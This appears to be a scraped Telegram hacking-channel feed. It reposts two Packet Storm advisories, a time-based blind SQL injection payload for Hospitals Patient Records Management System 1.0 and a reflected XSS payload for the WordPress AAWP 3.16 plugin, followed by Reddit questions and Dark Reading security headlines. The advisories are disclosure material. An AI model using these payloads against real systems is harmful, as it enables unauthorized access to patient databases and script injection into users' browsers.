Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.7K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Hospitals Patient Records Management System 1.0 SQL Injection

https://2.bp.blogspot.com/-x_QP5QrO-tY/WWlvkxoh72I/AAAAAAAAIQ4/t-2dHNJyeE0-qZNxsCg7sgdho_ipgPgbgCLcBGAs/s1600/h98.png
Hospitals Patient Records Management System version 1.0 suffers from a remote SQL injection vulnerability.

MD5 | b318587cf84726625fbb34fb7c3dc04c

Download
# Exploit Title: Hospitalss Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated)
# Date: 30/12/2021
# Exploit Author: twseptian
# Vendor Homepage: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hprms_0.zip
# Version: v1.0
# Tested on: Kali Linux 2021.4

*SQL Injection*
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Hospital's Patient Records Management System v1.0 is vulnerable to SQL injection via the 'id' parameter on the patient list.

*Attack Vector*
An attacker can compromise the database of the application using some automated(or manual) tools like SQLmap.

*Steps to reproduce:*
Step-1: On the dashboard navigate to 'Patient List', then go to 'Action' > 'View Records' page using the following URL:
http://localhost/hprms/admin/?page=patients/view_patient&id=1

Step-2: Put the SQL Injection payloads in 'id' field.
time-based blind payload : page=patients/view_patient&id=1' AND (SELECT 2664 FROM (SELECT(SLEEP(5)))ixec) AND 'XcAY'='XcAY

Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.


Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress AAWP 3.16 Cross Site Scripting

https://2.bp.blogspot.com/-DNFQNR6e8p4/WWlvIe_2SVI/AAAAAAAAILs/sd08rXaHefk0y1DdsYY6dPeiz0i718ntQCLcBGAs/s1600/h143.png
WordPress AAWP plugin version 3.16 suffers from a cross site scripting vulnerability.

MD5 | 1dd2000d7305a551456328c47722894f

Download
# Exploit Title: WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)
# Date: 04/01/2022
# Exploit Author: Andrea Bocchetti
# Vendor Homepage: https://getaawp.com/
# Software Link: https://getaawp.com/
# Version: 3.16
# Tested on: Windows 10 - Chrome, WordPress 5.8.2

# Proof of Concept:
# 1- Install and activate AAWP 3.16 plugin.
# 2- Go to https://localhost.com/wp-admin/admin.php?page=aawp-settings&tab=XXXX
# 3- Add payload to the Tab, the XSS Payload: %22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y
# 4- XSS has been triggered.

# Go to this url "http://localhost/wp-admin/admin.php?page=aawp-settings&tab=%22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y"
XSS will trigger.


Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Good videos on Linux directories

Anyone have any recommendations for videos in regards to the Linux file directory system

Mostly pertaining to Kali-Linux

Thanks

submitted by /u/madame-succubus
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Dark Reading: Attacks/Breaches
The World Is Increasingly Controlled and Transformed by Algorithms

Our digital interactions are being analyzed, predicted, and protected by algorithms and serve as a strategic, digital arsenal in defending against cyberattacks.
Dark Reading: Attacks/Breaches
Putting Ransomware Gangs Out of Business With AI

Organizations need to take matters into their own hands with a new approach.
Dark Reading: Attacks/Breaches
Why We Need To Reframe the False-Positive Problem

Efforts to tune or build behavior- or signature-based threat identification requires time and effort most organizations don't have.
hacking: security in practice
Is "The Web Application Hacker's Handbook" still relevant?

I was watching a bug bounty youtube video and the guy recommended this book, specifically "The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws 2nd Edition." It seems good, but it was written in 2011. Is it still usable? Are there any better alternatives?

submitted by /u/bbbcsgalcm
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Have people ever been arrested for cryptojacking botnet?

After several searches, I have only found cases of people targeting companies that have had legal repercussions.

But those who were doing it on private individuals only seem to have remained in the dark.

Have there been any notable cases of cryptojacker botnets being stopped by the authorities?

submitted by /u/Affectionate-Lack784
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Dark Reading: Attacks/Breaches
Which Cloud Strategy Is Right For My Organization's Security Needs?

The massive Amazon Web Services outage in December had many security leaders asking whether they should be going multicloud or multiregion for their cloud environments.
Dark Reading: Attacks/Breaches
New Attack Campaign Exploits Microsoft Signature Verification

The Malsmoke attack group is behind a campaign that has exploited the Microsoft e-signature verification tool to target 2,100 victims.